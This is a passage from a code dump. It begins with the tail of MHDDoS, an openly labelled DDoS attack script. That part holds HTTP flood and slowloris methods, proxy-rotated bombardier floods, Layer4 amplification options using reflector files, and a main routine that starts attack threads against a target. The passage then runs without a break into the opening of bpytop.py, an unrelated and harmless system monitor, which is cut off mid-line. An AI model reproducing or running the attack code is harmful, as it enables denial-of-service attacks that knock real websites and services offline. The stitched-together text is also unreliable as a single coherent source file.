"User-Agent: null\r\n" + "Referrer: null\r\n" + self.SpoofIP + "\r\n") s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def BOMB(self): pro = randchoice(self._proxies) run([ f'{Path.home() / "go/bin/bombardier"}', f'{bombardier_path}', f'--connections={self._rpc}', '--http2', '--method=GET', '--no-print', '--timeout=5s', f'--requests={self._rpc}', f'--proxy={pro}', f'{self._target.human_repr()}', ]) def SLOW(self): payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) while Tools.send(s, payload) and s.recv(1): for i in range(self._rpc): keep = str.encode("X-a: %d\r\n" % randint(1, 5000)) Tools.send(s, keep) sleep(self._rpc / 15) break Tools.safe_close(s) def select(self, name: str) -> None: self.SENT_FLOOD = self.GET if name == "POST": self.SENT_FLOOD = self.POST if name == "CFB": self.SENT_FLOOD = self.CFB if name == "CFBUAM": self.SENT_FLOOD = self.CFBUAM if name == "XMLRPC": self.SENT_FLOOD = self.XMLRPC if name == "BOT": self.SENT_FLOOD = self.BOT if name == "APACHE": self.SENT_FLOOD = self.APACHE if name == "BYPASS": self.SENT_FLOOD = self.BYPASS if name == "OVH": self.SENT_FLOOD = self.OVH if name == "AVB": self.SENT_FLOOD = self.AVB if name == "STRESS": self.SENT_FLOOD = self.STRESS if name == "DYN": self.SENT_FLOOD = self.DYN if name == "SLOW": self.SENT_FLOOD = self.SLOW if name == "GSB": self.SENT_FLOOD = self.GSB if name == "NULL": self.SENT_FLOOD = self.NULL if name == "COOKIE": self.SENT_FLOOD = self.COOKIES if name == "PPS": self.SENT_FLOOD = self.PPS self._defaultpayload = ( self._defaultpayload + "Host: %s\r\n\r\n" % self._target.authority).encode() if name == "EVEN": self.SENT_FLOOD = self.EVEN if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER if name == "BOMB": self.SENT_FLOOD = self.BOMB class ProxyManager: @staticmethod def DownloadFromConfig(cf, 
Proxy_type: int) -> Set[Proxy]: providrs = [ provider for provider in cf["proxy-providers"] if provider["type"] == Proxy_type or Proxy_type == 0 ] logger.info("Downloading Proxies form %d Providers" % len(providrs)) proxes: Set[Proxy] = set() with ThreadPoolExecutor(len(providrs)) as executor: future_to_download = { executor.submit( ProxyManager.download, provider, ProxyType.stringToProxyType(str(provider["type"]))) for provider in providrs } for future in as_completed(future_to_download): for pro in future.result(): proxes.add(pro) return proxes @staticmethod def download(provider, proxy_type: ProxyType) -> Set[Proxy]: logger.debug( "Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" % (provider["url"], proxy_type.name, provider["timeout"])) proxes: Set[Proxy] = set() with suppress(TimeoutError, exceptions.ConnectionError, exceptions.ReadTimeout): data = get(provider["url"], timeout=provider["timeout"]).text try: for proxy in ProxyUtiles.parseAllIPPort( data.splitlines(), proxy_type): proxes.add(proxy) except Exception as e: logger.error('Download Proxy Error: %s' % (e.__str__() or e.__repr__())) return proxes class ToolsConsole: METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"} @staticmethod def checkRawSocket(): with suppress(OSError): with socket(AF_INET, SOCK_RAW, IPPROTO_TCP): return True return False @staticmethod def runConsole(): cons = "%s@BetterStresser:~#" % gethostname() while 1: cmd = input(cons + " ").strip() if not cmd: continue if " " in cmd: cmd, args = cmd.split(" ", 1) cmd = cmd.upper() if cmd == "HELP": print("Tools:" + ", ".join(ToolsConsole.METHODS)) print("Commands: HELP, CLEAR, BACK, EXIT") continue if (cmd == "E") or \ (cmd == "EXIT") or \ (cmd == "Q") or \ (cmd == "QUIT") or \ (cmd == "LOGOUT") or \ (cmd == "CLOSE"): exit(-1) if cmd == "CLEAR": print("\033c") continue if not {cmd} & ToolsConsole.METHODS: print("%s command not found" % cmd) continue if cmd == "DSTAT": with suppress(KeyboardInterrupt): ld = 
net_io_counters(pernic=False) while True: sleep(1) od = ld ld = net_io_counters(pernic=False) t = [(last - now) for now, last in zip(od, ld)] logger.info( ("Bytes Sended %s\n" "Bytes Recived %s\n" "Packets Sended %s\n" "Packets Recived %s\n" "ErrIn %s\n" "ErrOut %s\n" "DropIn %s\n" "DropOut %s\n" "Cpu Usage %s\n" "Memory %s\n") % (Tools.humanbytes(t[0]), Tools.humanbytes(t[1]), Tools.humanformat(t[2]), Tools.humanformat(t[3]), t[4], t[5], t[6], t[7], str(cpu_percent()) + "%", str(virtual_memory().percent) + "%")) if cmd in ["CFIP", "DNS"]: print("Soon") continue if cmd == "CHECK": while True: with suppress(Exception): domain = input(f'{cons}give-me-ipaddress# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") continue if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) if "/" not in domain: continue logger.info("please wait ...") with get(domain, timeout=20) as r: logger.info(('status_code: %d\n' 'status: %s') % (r.status_code, "ONLINE" if r.status_code <= 500 else "OFFLINE")) if cmd == "INFO": while True: domain = input(f'{cons}give-me-ipaddress# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") continue if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) domain = domain.replace('https://', '').replace('http://', '') if "/" in domain: domain = domain.split("/")[0] print('please wait ...', end="\r") info = ToolsConsole.info(domain) if not info["success"]: print("Error!") continue logger.info(("Country: %s\n" "City: %s\n" "Org: %s\n" "Isp: %s\n" "Region: %s\n") % (info["country"], info["city"], info["org"], info["isp"], info["region"])) if cmd == "TSSRV": while True: 
domain = input(f'{cons}give-me-domain# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") continue if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) domain = domain.replace('https://', '').replace('http://', '') if "/" in domain: domain = domain.split("/")[0] print('please wait ...', end="\r") info = ToolsConsole.ts_srv(domain) logger.info("TCP: %s\n" % (info['_tsdns._tcp.'])) logger.info("UDP: %s\n" % (info['_ts3._udp.'])) if cmd == "PING": while True: domain = input(f'{cons}give-me-ipaddress# ') if not domain: continue if domain.upper() == "BACK": break if domain.upper() == "CLEAR": print("\033c") if (domain.upper() == "E") or \ (domain.upper() == "EXIT") or \ (domain.upper() == "Q") or \ (domain.upper() == "QUIT") or \ (domain.upper() == "LOGOUT") or \ (domain.upper() == "CLOSE"): exit(-1) domain = domain.replace('https://', '').replace('http://', '') if "/" in domain: domain = domain.split("/")[0] logger.info("please wait ...") r = ping(domain, count=5, interval=0.2) logger.info(('Address: %s\n' 'Ping: %d\n' 'Aceepted Packets: %d/%d\n' 'status: %s\n') % (r.address, r.avg_rtt, r.packets_received, r.packets_sent, "ONLINE" if r.is_alive else "OFFLINE")) @staticmethod def stop(): print('All Attacks has been Stopped !') for proc in process_iter(): if proc.name() == "python.exe": proc.kill() @staticmethod def usage(): print(( '* MHDDoS - DDoS Attack Script With %d Methods\n' 'Note: If the Proxy list is empty, the attack will run without proxies\n' ' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n' ' Proxy Type 0 = All in config.json\n' ' SocksTypes:\n' ' - 6 = RANDOM\n' ' - 5 = SOCKS5\n' ' - 4 = SOCKS4\n' ' - 1 = HTTP\n' ' - 0 = ALL\n' ' > Methods:\n' ' - Layer4\n' ' | %s | %d Methods\n' ' - Layer7\n' ' | %s | %d Methods\n' ' - 
Tools\n' ' | %s | %d Methods\n' ' - Others\n' ' | %s | %d Methods\n' ' - All %d Methods\n' '\n' 'Example:\n' ' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n' ' L4: python3 %s <method> <ip:port> <threads> <duration>\n' ' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n' ' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with' ' Amplification)>\n') % (len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS), ", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS), ", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS), ", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS), ", ".join(["TOOLS", "HELP", "STOP"]), 3, len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS), argv[0], argv[0], argv[0], argv[0])) # noinspection PyBroadException @staticmethod def ts_srv(domain): records = ['_ts3._udp.', '_tsdns._tcp.'] DnsResolver = resolver.Resolver() DnsResolver.timeout = 1 DnsResolver.lifetime = 1 Info = {} for rec in records: try: srv_records = resolver.resolve(rec + domain, 'SRV') for srv in srv_records: Info[rec] = str(srv.target).rstrip('.') + ':' + str( srv.port) except: Info[rec] = 'Not found' return Info # noinspection PyUnreachableCode @staticmethod def info(domain): with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s: return s.json() return {"success": False} def handleProxyList(con, proxy_li, proxy_ty, url=None): if proxy_ty not in {4, 5, 1, 0, 6}: exit("Socks Type Not Found [4, 5, 1, 0, 6]") if proxy_ty == 6: proxy_ty = randchoice([4, 5, 1]) if not proxy_li.exists(): logger.warning("The file doesn't exist, creating files and downloading proxies.") proxy_li.parent.mkdir(parents=True, exist_ok=True) with proxy_li.open("w") as wr: Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty) logger.info( f"{len(Proxies):,} Proxies are getting checked, this may take awhile!" 
) Proxies = ProxyChecker.checkAll( Proxies, timeout=1, threads=threads, url=url.human_repr() if url else "http://httpbin.org/get", ) if not Proxies: exit( "Proxy Check failed, Your network may be the problem" " | The target may not be available." ) stringBuilder = "" for proxy in Proxies: stringBuilder += (proxy.__str__() + "\n") wr.write(stringBuilder) proxies = ProxyUtiles.readFromFile(proxy_li) if proxies: logger.info(f"Proxy Count: {len(proxies):,}") else: logger.info( "Empty Proxy File, running flood witout proxy") proxies = None return proxies if __name__ == '__main__': with open(__dir__ / "config.json") as f: con = load(f) with suppress(KeyboardInterrupt): with suppress(IndexError): one = argv[1].upper() if one == "HELP": raise IndexError() if one == "TOOLS": ToolsConsole.runConsole() if one == "STOP": ToolsConsole.stop() method = one host = None url = None event = Event() event.clear() target = None urlraw = argv[2].strip() if not urlraw.startswith("http"): urlraw = "http://" + urlraw if method not in Methods.ALL_METHODS: exit("Method Not Found %s" % ", ".join(Methods.ALL_METHODS)) if method in Methods.LAYER7_METHODS: url = URL(urlraw) host = url.host try: host = gethostbyname(url.host) except Exception as e: exit('Cannot resolve hostname ', url.host, e) threads = int(argv[4]) rpc = int(argv[6]) timer = int(argv[7]) proxy_ty = int(argv[3].strip()) proxy_li = Path(__dir__ / "files/proxies/" / argv[5].strip()) useragent_li = Path(__dir__ / "files/useragent.txt") referers_li = Path(__dir__ / "files/referers.txt") bombardier_path = Path(__dir__ / "go/bin/bombardier") proxies: Any = set() if method == "BOMB": assert ( bombardier_path.exists() or bombardier_path.with_suffix('.exe').exists() ), ( "Install bombardier: " "https://github.com/MHProDev/MHDDoS/wiki/BOMB-method" ) if len(argv) == 9: logger.setLevel("DEBUG") if not useragent_li.exists(): exit("The Useragent file doesn't exist ") if not referers_li.exists(): exit("The Referer file doesn't exist ") uagents 
= set(a.strip() for a in useragent_li.open("r+").readlines()) referers = set(a.strip() for a in referers_li.open("r+").readlines()) if not uagents: exit("Empty Useragent File ") if not referers: exit("Empty Referer File ") if threads > 1000: logger.warning("Thread is higher than 1000") if rpc > 100: logger.warning( "RPC (Request Pre Connection) is higher than 100") proxies = handleProxyList(con, proxy_li, proxy_ty, url) for _ in range(threads): HttpFlood(url, host, method, rpc, event, uagents, referers, proxies).start() if method in Methods.LAYER4_METHODS: target = URL(urlraw) port = target.port target = target.host try: target = gethostbyname(target) except Exception as e: exit('Cannot resolve hostname ', url.host, e) if port > 65535 or port < 1: exit("Invalid Port [Min: 1 / Max: 65535] ") if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \ not ToolsConsole.checkRawSocket(): exit("Cannot Create Raw Socket") threads = int(argv[3]) timer = int(argv[4]) proxies = None ref = None if not port: logger.warning("Port Not Selected, Set To Default: 80") port = 80 if len(argv) >= 6: argfive = argv[5].strip() if argfive: refl_li = Path(__dir__ / "files" / argfive) if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}: if not refl_li.exists(): exit("The reflector file doesn't exist") if len(argv) == 7: logger.setLevel("DEBUG") ref = set(a.strip() for a in ProxyTools.Patterns.IP.findall( refl_li.open("r+").read())) if not ref: exit("Empty Reflector File ") elif argfive.isdigit() and len(argv) >= 7: if len(argv) == 8: logger.setLevel("DEBUG") proxy_ty = int(argfive) proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip()) proxies = handleProxyList(con, proxy_li, proxy_ty) if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}: exit("this method cannot use for layer4 proxy") else: logger.setLevel("DEBUG") for _ in range(threads): Layer4((target, port), ref, method, event, proxies).start() logger.info( "Attack Started to %s 
with %s method for %s seconds, threads: %d!" % (target or url.human_repr(), method, timer, threads)) event.set() ts = time() while time() < ts + timer: logger.debug('PPS: %s, BPS: %s / %d%%' % (Tools.humanformat(int(REQUESTS_SENT)), Tools.humanbytes(int(BYTES_SEND)), round((time() - ts) / timer * 100, 2))) REQUESTS_SENT.set(0) BYTES_SEND.set(0) sleep(1) event.clear() exit() ToolsConsole.usage()
bpytop.py
#!/usr/bin/env python3 # pylint: disable=not-callable, no-member # indent = tab # tab-size = 4 # Copyright 2020 Aristocratos (jakob@qvantnet.com) # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse import urllib.request from time import time, sleep, strftime, localtime from datetime import timedelta from _thread import interrupt_main from collections import defaultdict from select import select from distutils.util import strtobool from string import Template from math import ceil, floor from random import randint from shutil import which from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple errors: List[str] = [] try: import fcntl, termios, tty, pwd except Exception as e: errors.append(f'{e}') try: import psutil # type: ignore except Exception as e: errors.append(f'{e}') SELF_START = time() SYSTEM: str if "linux" in sys.platform: SYSTEM = "Linux" elif "bsd" in sys.platform: SYSTEM = "BSD" elif "darwin" in sys.platform: SYSTEM = "MacOS" else: SYSTEM = "Other" if errors: print("ERROR!") print("\n".join(errors)) if SYSTEM == "Other": print("\nUnsupported platform!\n") else: print("\nInstall required modules!\n") raise SystemExit(1) VERSION: str = "1.0.51" #? 
Argument parser -------------------------------------------------------------------------------> args = argparse.ArgumentParser() args.add_argument("-f" , "--full" ,action="store_true" ,help ="Start in full mode showing all boxes [default]") args.add_argument("-p" , "--proc" ,action="store_true" ,help ="Start in minimal mode without memory and net boxes") args.add_argument("-s" , "--stat" ,action="store_true" ,help ="Start in minimal mode without process box") args.add_argument("-v" , "--version" ,action="store_true" ,help ="Show version info and exit") args.add_argument("--debug" ,action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config") stdargs = args.parse_args() if stdargs.version: print(f'bpytop version: {VERSION}\n' f'psutil version: {".".join(str(x) for x in psutil.version_info)}') raise SystemExit(0) ARG_MODE: str = "" if stdargs.full: ARG_MODE = "full" elif stdargs.proc: ARG_MODE = "proc" elif stdargs.stat: ARG_MODE = "stat" DEBUG = stdargs.debug #? Variables -------------------------------------------------------------------------------------> BANNER_SRC: List[Tuple[str, str, str]] = [ ("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"), ("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"), ("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"), ("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "), ("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"), ("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"), ] #*?This is the template used to create the config file DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + ''' #* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme. #* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. 
color_theme="+monokai" color_theme="$color_theme" #* If the theme set background should be shown, set to False if you want terminal background transparency theme_background=$theme_background #* Set bpytop view mode, "full" for everything shown, "proc" for cpu stats and processes, "stat" for cpu, mem, disks and net stats shown. view_mode=$view_mode #* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs. update_ms=$update_ms #* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive", #* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly. proc_sorting="$proc_sorting" #* Reverse sorting order, True or False. proc_reversed=$proc_reversed #* Show processes as a tree proc_tree=$proc_tree #* Which depth the tree view should auto collapse processes at tree_depth=$tree_depth #* Use the cpu graph colors in the process list. proc_colors=$proc_colors #* Use a darkening gradient in the process list. proc_gradient=$proc_gradient #* If process cpu usage should be of the core it's running on or usage of the total available cpu power. proc_per_core=$proc_per_core #* Show process memory as bytes instead of percent proc_mem_bytes=$proc_mem_bytes #* Check cpu temperature, needs "osx-cpu-temp" on MacOS X. check_temp=$check_temp #* Which sensor to use for cpu temperature, use options menu to select from list of available sensors. cpu_sensor=$cpu_sensor #* Show temperatures for cpu cores also if check_temp is True and sensors has been found show_coretemp=$show_coretemp #* Draw a clock at top of screen, formatting according to strftime, empty string to disable. draw_clock="$draw_clock" #* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort. background_update=$background_update #* Custom cpu model name, empty string to disable. 
custom_cpu_name="$custom_cpu_name" #* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",". #* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user" disks_filter="$disks_filter" #* Show graphs instead of meters for memory values. mem_graphs=$mem_graphs #* If swap memory should be shown in memory box. show_swap=$show_swap #* Show swap as a disk, ignores show_swap value above, inserts itself after first disk. swap_disk=$swap_disk #* If mem box should be split to also show disks info. show_disks=$show_disks #* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit" net_download="$net_download" net_upload="$net_upload" #* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest. net_auto=$net_auto #* Sync the scaling for download and upload to whichever currently has the highest scale net_sync=$net_sync #* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values net_color_fixed=$net_color_fixed #* Show battery stats in top right if battery is present show_battery=$show_battery #* Show init screen at startup, the init screen is purely cosmetical show_init=$show_init #* Enable check for new version from github.com/aristocratos/bpytop at start. update_check=$update_check #* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG". #* The level set includes all lower levels, i.e. "DEBUG" will show all logging info. 
log_level=$log_level ''') CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop' if not os.path.isdir(CONFIG_DIR): try: os.makedirs(CONFIG_DIR) os.mkdir(f'{CONFIG_DIR}/themes') except PermissionError: print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!') raise SystemExit(1) CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf' THEME_DIR: str = "" if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'): THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes' else: for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]: if os.path.isdir(f'{td}share/bpytop/themes'): THEME_DIR = f'{td}share/bpytop/themes' break USER_THEME_DIR: str = f'{CONFIG_DIR}/themes' CORES: int = psutil.cpu_count(logical=False) or 1 THREADS: int = psutil.cpu_count(logical=True) or 1 THREAD_ERROR: int = 0 DEFAULT_THEME: Dict[str, str] = { "main_bg" : "", "main_fg" : "#cc", "title" : "#ee", "hi_fg" : "#969696", "selected_bg" : "#7e2626", "selected_fg" : "#ee", "inactive_fg" : "#40", "graph_text" : "#60", "meter_bg" : "#40", "proc_misc" : "#0de756", "cpu_box" : "#3d7b46", "mem_box" : "#8a882e", "net_box" : "#423ba5", "proc_box" : "#923535", "div_line" : "#30", "temp_start" : "#4897d4", "temp_mid" : "#5474e8", "temp_end" : "#ff40b6", "cpu_start" : "#50f095", "cpu_mid" : "#f2e266", "cpu_end" : "#fa1e1e", "free_start" : "#223014", "free_mid" : "#b5e685", "free_end" : "#dcff85", "cached_start" : "#0b1a29", "cached_mid" : "#74e6fc", "cached_end" : "#26c5ff", "available_start" : "#292107", "available_mid" : "#ffd77a", "available_end" : "#ffb814", "used_start" : "#3b1f1c", "used_mid" : "#d9626d", "used_end" : "#ff4769", "download_start" : "#231a63", "download_mid" : "#4f43a3", "download_end" : "#b0a9de", "upload_start" : "#510554", "upload_mid" : "#7d4180", "upload_end" : "#dcafde", "process_start" : "#80d0a3", "process_mid" : "#dcd179", "process_end" : "#d45454", } MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = { "options" : { "normal" : ( "┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐", "│ │├─┘ │ 
││ ││││└─┐", "└─┘┴ ┴ ┴└─┘┘└┘└─┘"), "selected" : ( "╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗", "║ ║╠═╝ ║ ║║ ║║║║╚═╗", "╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") }, "help" : { "normal" : ( "┬ ┬┌─┐┬ ┌─┐", "├─┤├┤ │ ├─┘", "┴ ┴└─┘┴─┘┴ "), "selected" : ( "╦ ╦╔═╗╦ ╔═╗", "╠═╣║╣ ║ ╠═╝", "╩ ╩╚═╝╩═╝╩ ") }, "quit" : { "normal" : ( "┌─┐ ┬ ┬ ┬┌┬┐", "│─┼┐│ │ │ │ ", "└─┘└└─┘ ┴ ┴ "), "selected" : ( "╔═╗ ╦ ╦ ╦╔╦╗ ", "║═╬╗║ ║ ║ ║ ", "╚═╝╚╚═╝ ╩ ╩ ") } } MENU_COLORS: Dict[str, Tuple[str, ...]] = { "normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"), "selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00") } #? Units for floating_humanizer function UNITS: Dict[str, Tuple[str, ...]] = { "bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"), "byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB") } #? Setup error logger ----------------------------------------------------------------> try: errlog = logging.getLogger("ErrorLogger") errlog.setLevel(logging.DEBUG) eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4) eh.setLevel(logging.DEBUG) eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)")) errlog.addHandler(eh) except PermissionError: print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!') raise SystemExit(1) #? 
Timers for testing and debugging -------------------------------------------------------------->

class TimeIt:
	'''Named stopwatch registry for ad-hoc profiling; results go to errlog at DEBUG level.'''
	# Running timers: name -> start timestamp from time() (epoch seconds)
	timers: Dict[str, float] = {}
	# Paused timers: name -> elapsed seconds banked before the pause
	paused: Dict[str, float] = {}

	@classmethod
	def start(cls, name):
		'''Start (or restart) the timer called *name*.'''
		cls.timers[name] = time()

	@classmethod
	def pause(cls, name):
		'''Pause a running timer, moving its elapsed time into cls.paused.'''
		if name in cls.timers:
			cls.paused[name] = time() - cls.timers[name]
			del cls.timers[name]

	@classmethod
	def stop(cls, name):
		'''Stop a running timer and log its total elapsed time, including any paused spans.

		No-op if *name* was never started (or was already stopped).
		'''
		if name in cls.timers:
			total: float = time() - cls.timers[name]
			del cls.timers[name]
			# Fold in time accumulated before an earlier pause(), if any
			if name in cls.paused:
				total += cls.paused[name]
				del cls.paused[name]
			errlog.debug(f'{name} completed in {total:.6f} seconds')

def timeit_decorator(func):
	'''Decorator: log the wrapped callable's wall-clock runtime to errlog at DEBUG level.'''
	def timed(*args, **kw):
		ts = time()
		out = func(*args, **kw)
		errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
		return out
	return timed

#? Set up config class and load config ----------------------------------------------------------->

class Config:
	'''Holds all config variables and functions for loading from and saving to disk'''
	# NOTE: the "keys" list below must stay in sync with the attribute defaults that follow;
	# the class body continues (and load/save logic is defined) past this point in the file.
	keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
		"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap", "swap_disk",
		"show_disks", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "view_mode", "theme_background", "net_sync", "show_battery",
		"tree_depth", "cpu_sensor", "show_coretemp"]
	conf_dict: Dict[str, Union[str, int, bool]] = {}
	color_theme: str = "Default"
	theme_background: bool = True
	update_ms: int = 2000
	proc_sorting: str = "cpu lazy"
	proc_reversed: bool = False
	proc_tree: bool = False
	tree_depth: int = 3
	proc_colors: bool = True
	proc_gradient: bool = True
	proc_per_core: bool = False
	proc_mem_bytes: bool = True
	check_temp: bool = True
	cpu_sensor: str = "Auto"
	show_coretemp: bool = True
	draw_clock: str = "%X"
	background_update: bool = True
	custom_cpu_name: str = ""
disks_filter: str = "" update_check: bool = True mem_graphs: bool = True show_swap: bool = True swap_disk: bool = True show_disks: bool = True net_download: str = "10M" net_upload: str = "10M" net_color_fixed: bool = False net_auto: bool = True net_sync: bool = False show_battery: bool = True show_init: bool = True view_mode: str = "full" log_level: str = "WARNING" warnings: List[str] = [] info: List[str] = [] sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"] log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"] view_modes: List[str] = ["full", "proc", "stat"] cpu_sensors: List[str] = [ "Auto" ] if hasattr(psutil, "sensors_temperatures"): try: _temps = psutil.sensors_temperatures() if _temps: for _name, _entries in _temps.items(): for _num, _entry in enumerate(_entries, 1): if hasattr(_entry, "current"): cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}') except: pass changed: bool = False recreate: bool = False config_file: str = "" _initialized: bool = False def __init__(self, path: str): self.config_file = path conf: Dict[str, Union[str, int, bool]] = self.load_config() if not "version" in conf.keys(): self.recreate = True self.info.append(f'Config file malformatted or missing, will be recreated on exit!') elif conf["version"] != VERSION: self.recreate = True self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!') for key in self.keys: if key in conf.keys() and conf[key] != "_error_": setattr(self, key, conf[key]) else: self.recreate = True self.conf_dict[key] = getattr(self, key) self._initialized = True def __setattr__(self, name, value): if self._initialized: object.__setattr__(self, "changed", True) object.__setattr__(self, name, value) if name not in ["_initialized", "recreate", "changed"]: self.conf_dict[name] = value def load_config(self) -> Dict[str, Union[str, int, bool]]: '''Load config from file, set correct 
types for values and return a dict''' new_config: Dict[str,Union[str, int, bool]] = {} conf_file: str = "" if os.path.isfile(self.config_file): conf_file = self.config_file elif os.path.isfile("/etc/bpytop.conf"): conf_file = "/etc/bpytop.conf" else: return new_config try: with open(conf_file, "r") as f: for line in f: line = line.strip() if line.startswith("#? Config"): new_config["version"] = line[line.find("v. ") + 3:] for key in self.keys: if line.startswith(key): line = line.replace(key + "=", "") if line.startswith('"'): line = line.strip('"') if type(getattr(self, key)) == int: try: new_config[key] = int(line) except ValueError: self.warnings.append(f'Config key "{key}" should be an integer!') if type(getattr(self, key)) == bool: try: new_config[key] = bool(strtobool(line)) except ValueError: self.warnings.append(f'Config key "{key}" can only be True or False!') if type(getattr(self, key)) == str: new_config[key] = str(line) except Exception as e: errlog.exception(str(e)) if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options: new_config["proc_sorting"] = "_error_" self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!') if "log_level" in new_config and not new_config["log_level"] in self.log_levels: new_config["log_level"] = "_error_" self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!') if "view_mode" in new_config and not new_config["view_mode"] in self.view_modes: new_config["view_mode"] = "_error_" self.warnings.append(f'Config key "view_mode" didn\'t get an acceptable value!') if isinstance(new_config["update_ms"], int) and new_config["update_ms"] < 100: new_config["update_ms"] = 100 self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!') for net_name in ["net_download", "net_upload"]: if net_name in new_config and not new_config[net_name][0].isdigit(): # type: 